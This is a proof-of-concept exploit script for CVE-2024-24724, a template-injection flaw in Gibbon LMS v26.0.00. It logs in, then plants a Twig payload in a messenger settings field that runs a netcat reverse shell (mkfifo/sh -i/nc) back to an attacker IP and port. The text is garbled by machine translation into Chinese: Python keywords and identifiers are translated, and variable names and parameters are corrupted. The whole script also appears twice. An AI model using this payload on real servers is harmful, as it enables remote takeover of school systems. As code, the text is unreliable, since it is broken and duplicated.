#利用标题:长臂猿LMS V26.0.00 -SSTI漏洞
#日期: 21.01.2024
#利用作者: Secondx.io研究团队(伊斯兰Rzayev,Fikrat Guliev,Ali Maharramli)
#供应商homepage: https://gibbonedu.org/
#软件link: https://github.com/gibbonedu/core
#版本: V26.0.00
#测试在: Ubuntu 22.0
#CVE : CVE-2024-24724
导入请求
导入
导入系统
def登录(target_host,target_port,电子邮件,密码):
url=f'http://{target_host} : {target_port}/login.php?timeout=true'
标题={'content-type':'multipart/form-data;
边界=----------------------------------- 17447595731268836341556039466'}
数据=
f'-------------------------------------------- 17447595731268836341556039466 \ r \ ncontent-disposition:
form-data;
name=\'address\'\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'method\'\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'username\'\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'password\'\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'gibbonSchoolYearID\'\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'gibboni18nID\'\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n'
r=requests.post(url,headers=标题,data=data,
ally_redirects=false)
session_cookie=re.split(r'\ s+',r.headers ['set-cookie'])
如果session_cookie [4]不是没有,并且'/index.php'in
str(R.Headers ['location']):
打印('登录成功!')
返回session_cookie [4]
def rce(cookie,target_host,target_port,tainter_ip,taints_port):
URL=
F'http://{target_host} : {target_port}/modules/school%20Admin/messengersettingsprocess.php'
标题={'content-type':'multipart/form-data;
边界=--------------------------------- 671426466631840027692410521651',
'cookie': cookie}
数据=
f'------------------------------------- 67142646631840027692410521651 \ r \ ncontent-disposition:
form-data; name=\'地址\'\ r \ n \ r \ n/模块/学校
admin/messengertings.php \ r \ n -------------------------------------------------------------------------------------------------- 671426466631840027692410521651 \ r \ r \ ncontent-disposition:
form-data;
name=\'enableHomeScreenWidget\'\r\n\r\nY\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition:
form-data; name=\'signaturetemplate \'\ r \ n \ r \ n {{{{{[\'rm /tmp /f; mkfifo
/tmp/f; cat/tmp/f | sh -i 21 | nc {tacterer_ip} {tactioner_port}
/tmp/f']|filter('system')}}}}\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\'messageBcc\'\r\n\r\n\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\'pinnedMessagesOnHome\'\r\n\r\nN\r\n-----------------------------67142646631840027692410521651--\r\n'
r=requests.post(url,headers=标题,data=data,
ally_redirects=false)
如果在str(R.Headers ['location']中的'Success0'):
打印(“有效载荷成功上传!”)
def触发器(cookie,target_host,target_port):
URL=
f'http://{target_host} : {target_port}/index.php?q=/modules/school%20Admin/messengersettings.phpreturn=success0'
标头={'cookie': cookie}
打印(“ RCE成功!”)
r=requests.get(url,headers=headers,ally_redirects=false)
如果name=='__ -Main __':
如果Len(sys.argv)!=7:
print('USAGE: script.py target_host target_port
Attacker_ip Attacker_port电子邮件密码')
sys.exit(1)
cookie=login(sys.argv [1],sys.argv [2],sys.argv [5],sys.argv [6])
RCE(cookie,sys.argv [1],sys.argv [2],sys.argv [3],sys.argv [4])
触发器(cookie,sys.argv [1],sys.argv [2])
#日期: 21.01.2024
#利用作者: Secondx.io研究团队(伊斯兰Rzayev,Fikrat Guliev,Ali Maharramli)
#供应商homepage: https://gibbonedu.org/
#软件link: https://github.com/gibbonedu/core
#版本: V26.0.00
#测试在: Ubuntu 22.0
#CVE : CVE-2024-24724
导入请求
导入
导入系统
def登录(target_host,target_port,电子邮件,密码):
url=f'http://{target_host} : {target_port}/login.php?timeout=true'
标题={'content-type':'multipart/form-data;
边界=----------------------------------- 17447595731268836341556039466'}
数据=
f'-------------------------------------------- 17447595731268836341556039466 \ r \ ncontent-disposition:
form-data;
name=\'address\'\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'method\'\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'username\'\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'password\'\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'gibbonSchoolYearID\'\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\'gibboni18nID\'\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n'
r=requests.post(url,headers=标题,data=data,
ally_redirects=false)
session_cookie=re.split(r'\ s+',r.headers ['set-cookie'])
如果session_cookie [4]不是没有,并且'/index.php'in
str(R.Headers ['location']):
打印('登录成功!')
返回session_cookie [4]
def rce(cookie,target_host,target_port,tainter_ip,taints_port):
URL=
F'http://{target_host} : {target_port}/modules/school%20Admin/messengersettingsprocess.php'
标题={'content-type':'multipart/form-data;
边界=--------------------------------- 671426466631840027692410521651',
'cookie': cookie}
数据=
f'------------------------------------- 67142646631840027692410521651 \ r \ ncontent-disposition:
form-data; name=\'地址\'\ r \ n \ r \ n/模块/学校
admin/messengertings.php \ r \ n -------------------------------------------------------------------------------------------------- 671426466631840027692410521651 \ r \ r \ ncontent-disposition:
form-data;
name=\'enableHomeScreenWidget\'\r\n\r\nY\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition:
form-data; name=\'signaturetemplate \'\ r \ n \ r \ n {{{{{[\'rm /tmp /f; mkfifo
/tmp/f; cat/tmp/f | sh -i 21 | nc {tacterer_ip} {tactioner_port}
/tmp/f']|filter('system')}}}}\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\'messageBcc\'\r\n\r\n\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\'pinnedMessagesOnHome\'\r\n\r\nN\r\n-----------------------------67142646631840027692410521651--\r\n'
r=requests.post(url,headers=标题,data=data,
ally_redirects=false)
如果在str(R.Headers ['location']中的'Success0'):
打印(“有效载荷成功上传!”)
def触发器(cookie,target_host,target_port):
URL=
f'http://{target_host} : {target_port}/index.php?q=/modules/school%20Admin/messengersettings.phpreturn=success0'
标头={'cookie': cookie}
打印(“ RCE成功!”)
r=requests.get(url,headers=headers,ally_redirects=false)
如果name=='__ -Main __':
如果Len(sys.argv)!=7:
print('USAGE: script.py target_host target_port
Attacker_ip Attacker_port电子邮件密码')
sys.exit(1)
cookie=login(sys.argv [1],sys.argv [2],sys.argv [5],sys.argv [6])
RCE(cookie,sys.argv [1],sys.argv [2],sys.argv [3],sys.argv [4])
触发器(cookie,sys.argv [1],sys.argv [2])